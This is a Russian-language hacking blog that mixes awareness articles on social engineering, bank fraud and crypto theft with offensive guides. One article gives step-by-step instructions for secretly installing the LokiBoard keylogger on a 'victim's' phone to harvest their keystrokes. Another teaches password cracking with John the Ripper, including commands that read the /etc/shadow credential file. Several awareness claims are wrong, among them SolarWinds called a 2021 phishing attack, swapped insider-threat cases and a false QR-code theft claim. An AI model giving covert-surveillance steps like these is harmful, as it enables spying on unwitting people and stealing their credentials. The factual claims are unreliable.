Blackmast_education

[BlackMAST]

Социальная инженерия как способ «взломать» человека

«На сегодняшний день нет такой технологии, которую нельзя было бы взломать с помощью социальной инженерии» - Френк Абигнейл.February 22, 2023

Вступить в наш чат

Если вы спросите специалиста по кибербезопасности: «Какое самое слабое звено в любой системе?» Ответ вас удивит — это люди.

Атака с использованием социальной инженерии — это тип кибератаки, в которой используются психологические манипуляции, чтобы заставить людей разгласить конфиденциальную информацию или выполнить действия, которые помогут злоумышленнику получить доступ к системе или личным данным. Эти атаки могут быть невероятно эффективными, а их последствия могут варьироваться от кражи личной информации до репутационного ущерба крупной компании и финансовых потерь.

В этой статье мы расскажем о различных видах атак социальной инженерии, методах, используемых злоумышленниками, и о том, как их предотвратить.

Виды атак социальной инженерии

Фишинг

Фишинговая атака — это атака с использованием социальной инженерии, включающая отправку электронных писем, сообщений под видом банка, интернет-магазина и других организаций, чтобы обманным путем заставить пользователей раскрыть свою личную информацию, такую как пароли или номера кредитных карт. Обычно фишинг относится к социальной инженерии, потому что в этом мошенничестве ключевую роль играет человеческая ошибка.

В 2018 году произошла крупная фишинговая атака, направленная на криптовалютную биржу Binance. Злоумышленники создали поддельный веб-сайт, который выглядел в точности как «Binance», и рассылали пользователям электронные письма с просьбой войти в свои учетные записи. Когда пользователи ввели свои учетные данные для входа, злоумышленники смогли получить доступ к их аккаунтам и украсть их криптовалюты.

Байтинг

Байтинг – метод, похожий на фишинг, также включающий в себя использование социальной инженерии. Его суть — заставить человека сделать то, что он обычно не делает, например, загрузить файл или открыть ссылку, предлагая определенное вознаграждение, такое как бесплатный подарок или скидку.

В 2011 году байтинг атака была направлена против Торговой палаты США. Нападавшие оставили USB-накопители на парковке штаб-квартиры Палаты. Когда сотрудники нашли их и подключили к своим компьютерам, было установлено вредоносное ПО, которое позволило злоумышленникам получить доступ к компьютерной сети Палаты.

Претекстинг

Обычно такая атака предполагает обращение к жертве по телефону с заранее заготовленным сценарием (претекстом), чтобы убедить человека раскрыть конфиденциальную информацию, например, данные кредитной карты.

В 2018 году атака со сценарием была направлена ​​на город Атланта. Злоумышленники представились сотрудниками компании, предоставляющей ИТ-услуги по городу, и убедили настоящих сотрудников раскрыть свои учетные данные для входа в систему. Злоумышленники смогли установить программу-вымогатель в компьютерной сети города и потребовали выкуп.

Целевой фишинг

Целевой фишинг — тип атаки, когда фишинг-сообщение отправляется не группе случайных пользователей, а конкретному лицу. Мошенники тщательно собирают информацию о пользователе, чтобы максимально персонализировать сообщение и сделать фишинг более эффективным.

В 2016 году целевая фишинговая атака была направлена против Национального комитета Демократической партии США. Злоумышленники разослали электронные письма сотрудникам DNC с просьбой сбросить пароли электронной почты. Когда сотрудники нажали на ссылку в электронном письме, они попали на поддельный веб-сайт, который выглядел как страница входа в электронную почту DNC. Злоумышленники смогли украсть конфиденциальную информацию и слить ее общественности.

Тейлгейтинг

Чтобы взломать хорошо защищенную цель, хакеры могут даже попытаться проникнуть в штаб-квартиру компании. Самая популярная уловка, которую используют преступники, не заключается в подделке учетных данных, все намного проще: злоумышленник просто проходит за кем-то, когда тот открывает дверь. В зарубежных компаниях эту практику называют «тейлгейтинг». Находясь внутри здания, хакеры используют манипуляции и хитрые уловки: при помощи навыков социальной инженерии, они обходят охранников, получают доступ к компьютерам и даже крадут документы.

В 2019 году тейлгейтинг-атака была нацелена на технологическую компанию Кремниевой долины. Злоумышленник выдал себя за курьера и проследовал за сотрудником в здание компании. Оказавшись внутри, злоумышленник смог украсть несколько ноутбуков.

Методы социальной инженерии

Злоумышленники используют ряд методов, чтобы завоевать доверие своей жертвы и заставить ее сделать что-то, что противоречит ее интересам. Некоторые из этих методов включают в себя:

Острая необходимость. Создание ощущения срочности и безотлагательности помогает убедить людей действовать быстро, не задумываясь о последствиях.
Власть. Злоумышленники изображают из себя авторитетных лиц, таких как сотрудники правоохранительных органов или специалисты по ИТ-безопасности, чтобы втереться в доверие своей жертвы.
Эмоция. Игра на эмоциях, таких как страх или сочувствие помогает злоумышленникам манипулировать жертвой и добиться желаемого в кратчайший срок.
Дефицит. Следующий метод заключается в создании ощущения нехватки или ограниченности, чтобы убедить жертву предпринять немедленные действия, например совершить покупку или разгласить личную информацию.
Знакомство. Чтобы завоевать доверие, злоумышленники выдают себя за людей или организации, с которыми жертва знакома или чьими услугами пользуется, например коллега или банк.
Запугивание. Тактика запугивания, например, с помощью угроз судебного иска или физической расправы, подталкивает людей к необдуманным поступкам, таким как разглашение конфиденциальной информации.
Обратная социальная инженерия. При обратной социальной инженерии злоумышленник позиционирует себя как жертву, нуждающуюся в помощи. Как только жертва проявит сочувствие, злоумышленник может получить доступ к личным данным.

Важно быть в курсе новейших методов социальной инженерии и проявлять осторожность при взаимодействии с незнакомыми людьми или организациями, особенно в Интернете.

Меры предосторожности

Чтобы предотвратить атаки социальной инженерии, следует:

Быть осторожным с электронными письмами и сообщениями от неизвестных источников: не переходите по ссылкам и ничего не загружайте из вложений. Прежде чем предпринимать какие-либо действия, проверьте личность отправителя.
Используйте многофакторную аутентификацию. Она помогает обеспечить вас дополнительным уровнем защиты. Злоумышленник не сможет получить доступ к вашим данным, если не будет знать код, отправленный на ваш телефон.
Используйте надежные и уникальные пароли. Сложные пароли труднее угадать, что затрудняет задачу для злоумышленников.
Установите защитное программное обеспечение: установите антивирусное и антивредоносное программное обеспечение на все устройства, чтобы обнаруживать и предотвращать атаки.
Будьте бдительны: всегда будьте на чеку и сообщайте о любых подозрительных действиях в соответствующие органы.

Заключение

Атаки социальной инженерии становятся все более изощренными и опасными. Не стоит недооценивать злоумышленников, которые используют ряд тактик и методов, чтобы завоевать доверие своих жертв и манипулировать ими для получения желаемого. Чтобы предотвратить атаки с использованием социальной инженерии, отдельные пользователи и организации должны проявлять бдительность и принимать меры, необходимые для защиты от этих атак. Выполнив советы по безопасности, описанные в этой статье, вы можете помочь защитить себя от атак социальной инженерии.

На этом все. Удачи!




​

 

[BlackMAST]

Главные киберугрозы в 2023

Вступить в наш чат

Количество кибератак растет по мере того, как мы становимся все более зависимыми от технологий и Интернета. Новые киберугрозы постоянно развиваются, становятся все более изощренными и непредсказуемыми, что затрудняет защиту наших данных. Чтобы суметь предотвратить риски, важно быть в курсе последних событий в мире хакинга.

В этой статье мы расскажем вам о новых киберугрозах с примерами из жизни и поделимся практическими советами о том, как защитить себя.

Атаки программ-вымогателей

Атаки программ-вымогателей — одни из самых разрушительных типов кибератак. Программа-вымогатель — это разновидность вредоносного ПО, которое шифрует ваши файлы и требует выкупа в обмен на ключ дешифрования. Такие атаки наносят значительный ущерб пользователям и компаниям, часто приводя к потере и краже данных.

Более того, в последние годы злоумышленники стали более изощренными и применяют новые тактики, такие как двойное вымогательство, при котором они сначала крадут данные, а затем шифруют их, чтобы потребовать выкуп.

В 2021 году атака программы-вымогателя была нацелена на Colonial Pipeline, крупный топливный трубопровод в Соединенных Штатах, что привело к повсеместной нехватке топлива и паническим закупкам в нескольких штатах.

Защита от угроз программ-вымогателей

Чтобы защитить себя от атак программ-вымогателей, убедитесь, что у вас есть надлежащие резервные копии ваших данных.
Также регулярно обновляйте свое программное обеспечение и соблюдайте осторожность при открытии электронных писем, сообщений из неизвестных источников.
Регулярное сканирование ваших устройств на наличие уязвимостей может помочь вам обнаружить программу-вымогатель.

Фишинговые атаки

Фишинговые атаки — это тип кибератаки, при которой жертву обманом заставляют сообщать личную информацию, такую как учетные данные для входа, номера кредитных карт и другие конфиденциальные данные.

Злоумышленники используют различные тактики, такие как электронные письма, сообщения или телефонные звонки. Фишинговые атаки широко распространены и представляют значительный риск для доверчивых и невнимательных пользователей. Киберпреступники становятся все более виртуозными в создании убедительных сценариев, поддельных веб-сайтов и страниц для входа.

В 2021 году произошла фишинговая атака на компанию-разработчика программного обеспечения SolarWinds, которая привела к крупному сбою поставок и затронула несколько государственных учреждений и частных компаний США.

Защита от фишинговых угроз

Чтобы защитить себя от фишинговых атак, всегда будьте осторожны при переходе по ссылкам или загрузке файлов из неизвестных источников.
Убедитесь, что у вас установлено ПО для защиты от фишинга.
Регулярно обновляйте программное обеспечение и антивирус.
Относитесь с подозрением к любым нежелательными сообщениям и звонкам из неизвестных источников.

Безопасность Интернета вещей (IoT)

Интернет вещей (IoT) — это сеть физических устройств, транспортных средств и других объектов, оснащенных датчиками, программным обеспечением и средствами связи, что позволяет им подключаться и обмениваться данными. Эти устройства имеют много преимуществ, но они также представляют значительный риск для безопасности. Устройства IoT могут быть уязвимы для атак и могут использоваться для получения доступа к другим частям сети.

В 2021 году в популярной системе умных дверных замков была обнаружена уязвимость, которая позволила злоумышленникам удаленно открывать двери без особого труда. Таким образом, эта уязвимость долго использовалась для получения доступа к чужим домам и предприятиям.

Защита от IoT-угроз

Чтобы защитить себя от угроз безопасности IoT, важно убедиться, что вы меняете пароли по умолчанию на устройствах IoT и поддерживаете их программное обеспечение в актуальном состоянии.
Для дополнительной защиты используйте отдельную сеть для IoT устройств, чтобы изолировать их.
Кроме того, регулярно проверяйте свои устройства на наличие подозрительной активности и отключайте все неиспользуемые функции.

Облачная безопасность

Облачные хранилища становятся все более популярными, но также имеют свои уязвимости в безопасности. Облачная безопасность относится к защите данных и приложений, размещенных на удаленных серверах.

В 2021 году неправильно настроенный облачный сервер привел к утечке данных, в результате которой была раскрыта личная информация миллионов пользователей популярного мобильного приложения.

Как защитить свое облачное хранилище

Чтобы защитить себя от угроз, важно выбирать надежных облачных провайдеров, использовать надежные пароли и включать многофакторную аутентификацию.
Вы также должны регулярно проверять свои облачные хранилища на предмет необычной активности и шифровать данные.

Внутренние угрозы

Внутренние угрозы происходят со стороны сотрудников или подрядчиков, имеющих доступ к конфиденциальной информации. Они могут быть как умышленными, так и непреднамеренными. В первом случае лица могут случайным образом совершить ошибку по невнимательности, которая приведет к подрыву безопасности. Во втором же — это запланированная операция сотрудниками, имеющими конфиденциальный доступ к данным.

В 2013 году Эдвард Сноуден, подрядчик Агентства национальной безопасности (АНБ), передал в прессу секретную информацию о программах наблюдения агентства. Утечка стала одной из крупнейших в истории и нанесла значительный ущерб репутации АНБ.

Защита от внутренних угроз

Для защиты от внутренних угроз организации должны иметь четкие правила и процедуры для управления доступом конфиденциальными данными и системами. Они должны включать регулярное обучение сотрудников и подрядчиков тому, как выявлять подозрительное поведение и сразу же докладывать о нем.
Также важно отслеживать действия пользователей и внедрять средства управления безопасностью, такие как контроль доступа, предотвращение потери данных и аналитика поведения сотрудников.

Киберфизические атаки

Киберфизические атаки — это тип кибератак, направленных на физические системы или инфраструктуру (электрические сети, транспортные системы и промышленные системы управления). Они становятся все более распространенными по мере того, как системы все чаще зависят от технологий. Эти атаки могут повлечь за собой реальный ущерб и сбои в системе.

Одним из примеров киберфизической атаки является червь Stuxnet, который был обнаружен в 2010 году. Червь Stuxnet был разработан для атак на промышленные системы управления, используемые на ядерных объектах в Иране. Он смог нанести физический ущерб центрифугам, используемым при обогащении урана с помощью манипуляций их рабочими параметрами. Атака была сложной и требовала высокого уровня знаний для ее выполнения. Именно поэтому, многие убеждены, что это было осуществлено правительством.

Защита от киберфизических угроз

Для защиты от киберфизических атак организациям необходимо применять многоуровневый подход к безопасности:

Внедрение строгого контроля доступа и механизмов аутентификации для предотвращения неразрешенного доступа к критически важным системам.
Мониторинг систем на предмет подозрительной активности и внедрение средств безопасности, которые могут обнаруживать и предотвращать атаки.

Заключение

Рассмотренные выше примеры иллюстрируют реальное влияние киберугроз. Поскольку технологии продолжают развиваться, организациям и отдельным лицам важно сохранять бдительность и предпринимать шаги для защиты от возможных угроз. Будьте в курсе последних тенденций в области безопасности, а мы поможем минимизировать риск кибератак и защитить ваши конфиденциальные данные. На этом все. Удачи!




​

 

[BlackMAST]

Обзор Loki Board — бесплатный кейлоггер для Android

Вступить в наш чат​

Опытные взломщики владеют сотнями инструментов, с помощью которых они могут красть учетные данные, взламывать системы кибербезопасности и многое другое. Возможно, самым действенным из всех приложений является кейлоггер. Кейлоггер — необходимый инструмент в арсенале каждого хакера, но, как и многие другие инструменты, он требует наличие Kali Linux. Однако, сегодня мы поделимся с вами карманным, а главное бесплатным кейлоггером для Android под названием LokiBoard.

​

Что такое кейлоггер
​

Кейлоггер — своеобразный клавиатурный шпион, который собирает нажатия клавиш и ведет учет всей сохраненной информации. Кейлоггер чаще всего используется для сбора конфиденциальных данных, например, паролей.
Кейлоггеры остаются незамеченными в течение длительного времени, регистрируя действия с клавиатуры и давая злоумышленнику возможность ближе подобраться к личной информации жертвы. Кейлоггеры крайне опасны для жертвы, потому что их трудно обнаружить, но очень эффективны для хакеров.
Сегодня же речь пойдет о кейлоггере LokiBoard, который вы можете скачать прямо на телефон. Это простое в использовании приложение с открытым исходным кодом, которое необходимо установить на устройстве жертвы, после чего оно будет записывать все нажатия клавиш.
Скачать кейлоггер Lokiboard в Google Play.

Как использовать кейлоггер LokiBoard
​

Шаг 1: Установите приложение на устройство жертвы.
Шаг 2: Откройте раздел «Язык и ввод» в настройках системы Android.
Шаг 3: Включите Lokiboard и отключите все другие формы ввода, чтобы использовалось только наше приложение.
Шаг 4: Поскольку иконка приложения отсутствует на главном экране по понятным причинам, войти в LokiBoard можно, коснувшись LokiBoard в разделе языка и ввода в настройках.
Шаг 5: Как только жертва наберет текст на клавиатуре, все нажатия клавиш автоматически будут сохранены, и с помощью файлового менеджера вы сможете легко получить доступ к данным кейлоггера.
Путь, по которому будут сохранены нажатия показан ниже:

​

Вот и все. Это был один из самых известных кейлоггеров для Android, благодаря которому вы можете получить доступ к личной информации жертвы прямо в телефоне без использования Kali Linux. Надеемся, что данная статья оказалась полезной для вас. Удачи!




​

​

 

[BlackMAST]

Банковское мошенничество: выводим злоумышленников на чистую воду

​

Вступить в наш чат​

В последнее время число банковских афер выросло до такой степени, что уже невозможно оставаться в стороне, игнорируя риски. Киберпреступники становятся все умнее и изобретательнее, когда дело касается взлома с помощью социальной инженерии. Наверняка, каждому из вас хоть раз поступал звонок или приходило сообщение, отправителем которого якобы являлся банк. Ключ к вашей безопасности — умение отличать подлинное сообщение от мошеннических уловок.​

Узнайте, какие приемы используют банковские мошенники, а также 10 клише-сценариев, которые они активно применяют в своих злодеяниях.
​

1. «Подтвердите свою личность»
​

Сообщение, звонок или электронное письмо с просьбой предоставить конфиденциальную информацию, чтобы «подтвердить», что это вы.
Ваш банк может время от времени отправлять вам сообщения из соображений безопасности в случаях подозрительной активности на вашем счете — но банк никогда не попросит вас подтвердить вашу личность, предоставив секретную информацию по телефону или в виде сообщений.
Если вы сомневаетесь, то не нажимайте на ссылки, не отвечайте на электронные письма, не звоните по каким-либо номерам. Вместо этого позвоните в свой банк по его официальному номеру службы поддержки и убедитесь, что сообщение поступило от них.

2. «Обновите ваше банковское приложение»
​

Банки никогда не попросят вас установить или обновить приложение по электронной почте. При загрузке и обновлении всегда используйте официальный магазин приложений в вашем телефоне, избегая всех других источников, потому что, установив приложение из сообщения, ваша система будет скомпрометирована, а учетная запись взломана.

3. «Через 30 минут ваша карта будет заблокирована»
​

Если вам поступило сообщение о том, что ваша карта будет заблокирована, поэтому нужно срочно позвонить на какой-то номер или перейти по ссылке, не спешите это делать. Ваш банк может временно заморозить вашу карту в том случае, если была замечена подозрительная активность или мошенничество. Но банки не сообщают сроки по электронной почте или в сообщениях, тем более не закрывают счета без вашего ведома. Вместо этого, они предпримут необходимые юридические процедуры, и вы будете уведомлены об этом лично. Любое сообщение с дедлайном — фейк. Хакеры создают ощущение срочности и неотложности, чтобы у жертвы было как можно меньше времени на раздумья и проверку подлинности сообщения. В случае подозрительных сообщений звоните только на официальный номер своего банка.

4. «Сохраните документ во вложении»
​

Мошенники с помощью электронных писем распространяют документ зараженный банковским троянцем Emotet. С его помощью злоумышленники получают доступ к данным на устройствах. Как только пользователь откроет такое вложение, Emotet автоматически установится на компьютер, поставив под угрозу все пароли и безопасность.
Ваш банк не будет распространять приложения, документы и файлы таким образом — вместо этого попросит скачать из официального магазина приложений или с официального сайта.

5. «Отправили курьера, чтобы забрать вашу неисправную банковскую карту»
​

Вам поступает звонок от оператора банка, который сообщает, что ваша карта неисправна, поэтому требуется срочная замена. После чего оператор добродушно предлагает отправить курьера, чтобы тот передал новую карту и забрал старую. Когда курьер прибудет, он запросит PIN-код вашей карты в качестве «подтверждения». И вскоре – все ваши деньги волшебным образом исчезнут. Жертвами этого сценария стали тысячи людей — не поддавайтесь на такие аферы.
Если ваша карта действительно неисправна, то банк попросит вас лично приехать в офис для решения проблемы.

6. «Продиктуйте, пожалуйста, ваш CVV код»
​

Старый метод мошенничества, при котором вам поступает звонок либо из «полиции», либо из «вашего банка», где сообщается, что на вашей карте или банковском счёте была обнаружена мошенническая деятельность. Голос по телефону будет спекулировать юридическими терминами, ссылаться на правовые акты, пытаясь внушить вам законность своих действий, а затем мимоходом запросит у вас пароль или другую конфиденциальную информацию.
Банки никогда не будут запрашивать такие детали по телефону или в сообщениях. Не поддавайтесь на эти очевидные мошеннические схемы.

7. Фишинговая страница сайта банка
​

Злоумышленники создают поддельные сайты, которые в точности выглядит как настоящие. Единственная их разница — это URL-адрес, который незначительно отличается. Допустим, вы хотели попасть на сайт ВТБ, но по невнимательности открыли фишинговую ссылку «vtbb.ru» вместо официальной «vtb.ru» — вы оказались на фейковом сайте, который создали мошенники для компрометации банковских карт.
Внимательно проверяйте URL-адрес, чтобы убедиться, что это действительно настоящий веб-сайт. Вы всегда можете добавить ссылки на часто посещаемые страницы в быстрый поиск, так вы сэкономите время на проверки.

8. Обращение «Уважаемый клиент» или «Дорогой вашимейл@gmail.com»
​

Банки всегда будут обращаться к вам по имени и отчеству. Любые электронные письма, начинающиеся с «Уважаемый клиент» или «Уважаемый [адрес электронной почты]», являются поддельными, и в основном представляют собой автоматический спам, используемый для получения персональных данных или распространения вирусов. Не доверяйте ни одному электронному письму с такими очевидным обманом.

9. Сообщение с пустым адресным полем или с большим количеством упомянутых имейлов
​

Если вы получаете сообщение от вашего настоящего банка, оно должно быть адресовано только вам — не только в сообщении, но и в шапке письма. Убедитесь, что электронная почта совпадает с официальной, указанной на сайте.

10. Электронное письмо с просьбой подтвердить информацию
​

Если вы видите сообщение или электронное письмо с просьбой подтвердить какую-либо информациию, закройте его и позвоните в свой банк. Банк никогда не отправит подобных сообщений — в случае подозрительной активности вас попросят связаться с банком напрямую. Не отвечайте на такие письма, вместо этого сообщите о них как о спаме.

Заключение
​

Злоумышленники искусно владеют социальной инженерией и готовы пойти на все, чтобы обманным путем выведать у вас персональную информацию и банковские данные. Их приемы, хоть и являются, на первый взгляд, банальными, уже многие годы оставляют людей без денег на счетах. Попасть на удочку может любой — не только по глупости и доверчивости, но и по невнимательности. Если вы сомневаетесь в законности сообщения или звонка, обратитесь за профессиональной помощью в банк, чтобы защитить себя и свои деньги от банковского мошенничества. На этом все. Будьте внимательны и осторожны!

 

[BlackMAST]

Как взломать пароли с помощью John The Ripper (linux, zip, rar, hash)

Вступить в наш чат​

Сегодня мы научимся взламывать пароли вместе с John The Ripper или, как его еще называют, Джоном Потрошителем. Если вы никогда не слышали об этом инструменте, то вы многое пропустили. Джон Потрошитель — это утилита для взлома паролей с открытым исходным кодом, которой активно пользуются все взломщики. Многофункциональность и большие возможности инструмента сделали его фаворитом многих людей в хакерском сообществе.

​

Что такое John the Ripper
​

Как упоминалось ранее, John the Ripper — это инструмент для взлома паролей, разработанный OpenWall, который по умолчанию включен в Kali Linux. Он может автоматически обнаруживать и расшифровывать хешированные пароли, что является стандартным способом хранения паролей во всех операционных системах. Джон Потрошитель является полноценным инструментом для взлома паролей, но также имеет платные версии с дополнительными функциями.
Итак, давайте приступим к взлому.
Скачать бесплатную версию Джона можно здесь.
Если у вас Kali Linux, то утилита уже предустановлена.
Мы подготовили следующие 4 руководства для взлома паролей с помощью John The Ripper:
1. Взлом паролей Linux;
2. Взлом файлов Zip, Rar, защищенных паролем;
3. Расшифровка хэш-файлов;
4. Использование списка слов для взлома паролей.

1. Взлом паролей Linux
​

Если вы пользуетесь Kali Linux не первый день, то вы знаете, что в этой ОС пароли хранятся в теневом файле, который хеширован и защищен. Кроме того, вы не можете напрямую просматривать файлы. Но с Джоном это становится выполнимым, потому что теперь получить доступ к паролю Linux можно за считанные минуты.
Чтобы взломать пароль Linux с помощью John The Ripper, введите в терминале следующую команду:

• unshadow /etc/passwd /etc/shadow > crack.txt

unshadow — это команда, которая может извлекать хеши и отправлять их в файл crack.txt. Джон может использовать эти файлы с сохраненными хэшами для их взлома.
В зависимости от сложности пароля время, необходимое для его взлома, будет меняться. Кроме того, если вы используете список слов, пароль должен присутствовать в списке слов.
Если вы не видите пароль или хотите увидеть его снова, введите следующую команду:

• cat /root/.john/john.pot

Где test123 это пароль
Примечание: Имейте ввиду, что взлом пароля требует больших ресурсов, поэтому ваши ПК могут нагреваться, если нет надлежащего охлаждения.

2. Взлом файлов Zip и Rar, защищенных паролем
​

Мы довольно часто сталкиваемся с запароленными zip-файлами, в частности, если загружаем что-то из Интернета. Так, давайте попробуем взломать пароль zip-файла.
Откройте папку, в которой находится zip-файл. В терминале смените каталог с помощью команды cd и введите следующую команду:

• zip2john file > output.txt

file = имя zip файла
После использования этой команды вы увидите файл output.txt, в котором хранятся хэши zip-файла.
Чтобы взломать хэш zip-файла, введите:

• john –format=zip output.txt

С помощью этой команды начнется процесс взлома zip пароля. Обратите внимание, что это займет N-время, в зависимости от сложности пароля.
В случае взлома паролей файлов «rar» просто замените «zip» на «rar». Например:

• rar2john file > output.txt
• John –format=rar output.txt

Все остальные действия остаются неизменными.

3. Расшифровка хеш-файлов
​

В качестве подготовки вам нужно сохранить хэш, который вы хотите расшифровать, в текстовом файле. Теперь давайте воспользуемся Джоном для расшифровки хэша и доступа к паролю.
Чтобы расшифровать его, используйте LM Хэши:
SHA1
Чтобы расшифровать SHA1, мы будем использовать RockYou из списка слов и взламывать пароль, как показано ниже:

• john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-sha1 crack.txt

SHA256

• john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-sha256 crack.txt

MD5

• john –format=raw-md5 hash.txt

Подождите, пока файл хэша будет расшифрован. Как только файл будет расшифрован, вы увидите пароль.
Чтобы просмотреть все форматы, поддерживаемые john, введите следующую команду:

• john –list=formats

4. Использование пользовательского списка слов для взлома паролей
​

Если вы хотите применить атаку по списку слов, то это займет у вас много времени и сил. Однако, вы можете облегчить себе задачу с помощью Джона Потрошителя, который использует пользовательский словарь, содержащий список наиболее часто используемых паролей по всему миру. Введите:

• john –format=raw-sha1 –wordlist password.txt THEHASHFILE.txt

Вы можете также попробовать и следующую команду:

• john –wordlist=/usr/share/john/password.lst hashfile

Здесь, в приведенной выше команде, мы использовали файл password.lst. Но вы можете использовать любой файл, какой захотите.

Вот вы и научились использовать инструмент John The Ripper для взлома паролей. На этом всё. Надеемся, что данная статья оказалась полезной для вас. Удачи!​

 

[BlackMAST]

Топ-7 способов взломать криптокошелек. Как сберечь свои средства

​

Вступить в наш чат

Отгадайте загадку: «Её легко украсть и почти невозможно вернуть». Совершенно верно, речь идет о криптовалюте. Мошенники всегда находятся в поисках новых схем кражи денег пользователей. А наблюдаемый в последние годы массовый рост использования криптовалюты дает большое количество возможностей для хакеров. В этой статье мы решили рассказать про различные виды угроз, с которыми может столкнуться каждый человек, а также способы противостоять злоумышленникам.
​

​

1. Фишинг

Этот метод состоит в том, что мошенник регистрирует домен, который на первый взгляд нельзя отличить от биткоин кошелька, но разница заключается в нескольких символах в URL-адресе. После чего он создает аналогичный сайт, который завлекает пользователей своей рекламой.
Возьмем в качестве примера известный кошелек blockchain.com. Мы набрали название в Google, и первыми выскочили несколько подозрительных ресурсов:
​

Открываем один из них, и мы отказываемся на фишинговом сайте, который внешне практически не отличим от официального, за исключением трех букв в домене: вместо «blockchain.com» получилось «blockrcnain.com»:
​

Если ввести свой ID и пароль на таком сайте, то злоумышленники смогут без проблем вывести все ваши средства. Чтобы не попасться в ловушку, достаточно добавить официальный сайт в закладки.
​

2. Мобильные приложения

Злоумышленники также могут орудовать в Google Play и других мобильных магазинах приложений. Суть этого развода проста: создается приложение и загружается в Гугл Маркет, где любой желающий может найти его с помощью поиска. После установки и ввода своих данные для входа, вся информация утекает прямо к злоумышленнику. Ниже приведены примеры таких приложений:
​

А вот один из отзывов жертвы:
​

Чтобы не быть обманутым, нужно искать не в поиске приложений, а на официальных сайтах. В том же Блокчейне всего 2 ссылки, одна на Google Play, а другая в App Store. Рейтинг 5 звезд и много положительных отзывов не являются показателем надежности и безопасности.
​

3. Взлом с помощью QR-кода

В каждом криптокошельке есть QR-код, и выглядит он так:
​

Если злоумышленник просканирует его, то легко сможет вывести средства с вашего кошелька. На просторах интернета много способов, как его можно заполучить, поэтому никогда и ни при каких случаях не показывайте его.
​

4. Браузерные расширения

Кроме того, злоумышленники могут создать расширение с тем же интерфейсом, что и у популярных криптовалютных кошельков Trezor, Metamask или Ledger. Основная цель — заставить жертву рассекретить свою сид-фразу. Используя эту фразу, вы можете восстановить доступ к своему кошельку и вывести криптовалюту. Например, если зайти в Chrome Web Store и ввести в поиске "Metamask", то мы увидим 3 кошелька, 1 из которых настоящий, а 2 от неизвестных авторов, которые мы однозначно не советуем устанавливать:

​

​

Хотя мошеннические расширения регулярно удаляются, неизбежно появляются новые:​

​

5. Clipрer

Clipper — это программа, которая заменяет адреса кошельков в буфере обмена. Когда пользователь копирует адрес своего криптокошелька в буфер обмена, программа заменяет его адресом, принадлежащим злоумышленнику. Таким образом, когда жертва отправляет свои средства, она на самом деле отправляет их на кошелек, принадлежащий злоумышленникам.
Чтобы этого не произошло, никогда не переходите по неизвестным ссылкам, а также всегда проверяйте первую и последнюю цифры кошелька перед отправкой криптовалюты.
​

6. Замена SIM-карты

Уже ни раз приходилось слышать в новостях о случаях кражи средств путем замены SIM-карты. Хакеры звонят в службу поддержки мобильного оператора с просьбой восстановить номер телефона жертвы. Затем они получают доступ к учетной записи Google и могут вывести все средства:
​

Чтобы не потерять криптовалюту таким способом, купите отдельную SIM-карту для всех важных кошельков и никому не давайте номер телефона.
​

7. Скам биржи

Существуют проверенные биржи, которые славятся надёжной репутацией уже многие годы, но бывают и скамерские проекты, которые, проработав некоторое время, в один прекрасный момент исчезают с радаров вместе с вашими деньгами.

​

Чтобы не стать жертвой очередного **** проекта, следует торговать только на крупных площадках, которые работают не первый год. Помимо этого, не нужно хранить деньги на биржах, вместо этого отлично подойдут аппаратные кошельки.
​

Заключение

Итак, вы ознакомились лишь с малой частью способов кражи криптовалюты, но на самом деле их существует бесчисленное множество! Стоит проявлять предельную бдительность и осторожность, следуя всем вышеуказанным советам, а именно внимательно проверять домены, кошельки, приложения и т.д. Ведь, если злоумышленник заполучит доступ к вашему криптокошельку, у вас почти не будет шансов вернуть украденные средства, поскольку все транзакции анонимны.

​

​

 

[BlackMAST]

Трюки с Блокнотом, которые вас удивят

Вступить в наш чат​

Программу Блокнот очень сильно недооценивают. Признайтесь, как часто вы пользуетесь ей? Готовы поспорить, что все ваши действия в этой программе заканчиваются на наборе случайного текста с периодичностью раз в год. А знаете ли вы, какие-либо лайфхаки с использованием Блокнота? Сегодня мы приготовили несколько необычных трюков. И все, что вам потребуется, это БЛОКНОТ!

1. Дневник/журнал
​

Хотите вести цифровой дневник без использования каких-либо сторонних приложений и программ? Как вы уже могли догадаться, вам понадобиться лишь Блокнот.
Шаг 1: Откройте Блокнот из меню «Пуск» или командной строки.
Шаг 2: Введите «.LOG» в первой строке.
Шаг 3: Сохраните файл как name.txt.
Теперь, когда вы открываете файл, он будет отображать дату и время, чтобы вы могли написать все, что захотите.

2. Заставьте клавиатуру мигать, как диско шар
​

Этот трюк заставит мигать клавиатуру, что наверняка напугает жертву, заставив думать, что ее взломали или что-то в этом роде. Скопируйте и вставьте код в Блокнот и сохраните его как «disco.vbs».
Код:

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop

3. Проверьте, как хорошо работает ваш антивирус
​

Многие антивирусные программы могут быть эффективными и молниеносно находить вирусы, а другие нет. У вас есть возможность узнать, к какой категории относится ваш антивирус с помощью этого простого трюка. Скопируйте и вставьте приведенный ниже код в свой блокнот и сохраните его как «virus.exe» (не волнуйтесь, это не является никаким вирусом на самом деле). Затем как обычно выполните проверку на наличие вирусов.
Если этот файл обнаружится, значит, ваш антивирус исправен. В противном случае нужно начинать искать другие варианты. Это один из самых полезных лайфхаков в Блокноте.
Код:

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

4. Защитите файл паролем
​

Наверняка, на вашем компьютере есть файлы, которые вы хотите сохранить в тайне. И вы, вероятно, используете стороннее приложение для этого. Но что, если мы скажем, что вам оно не нужно? Этот лайфхак поможет защитить файл от любопытных глаз паролем. Да, никакого стороннего софта, только несколько строк кода. Звучит круто, правда?
Скопируйте и вставьте код, написанный ниже, и сохраните файл с расширением «.bat».
Код:

title Folder Private
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock the folder
set/p “pass=>”
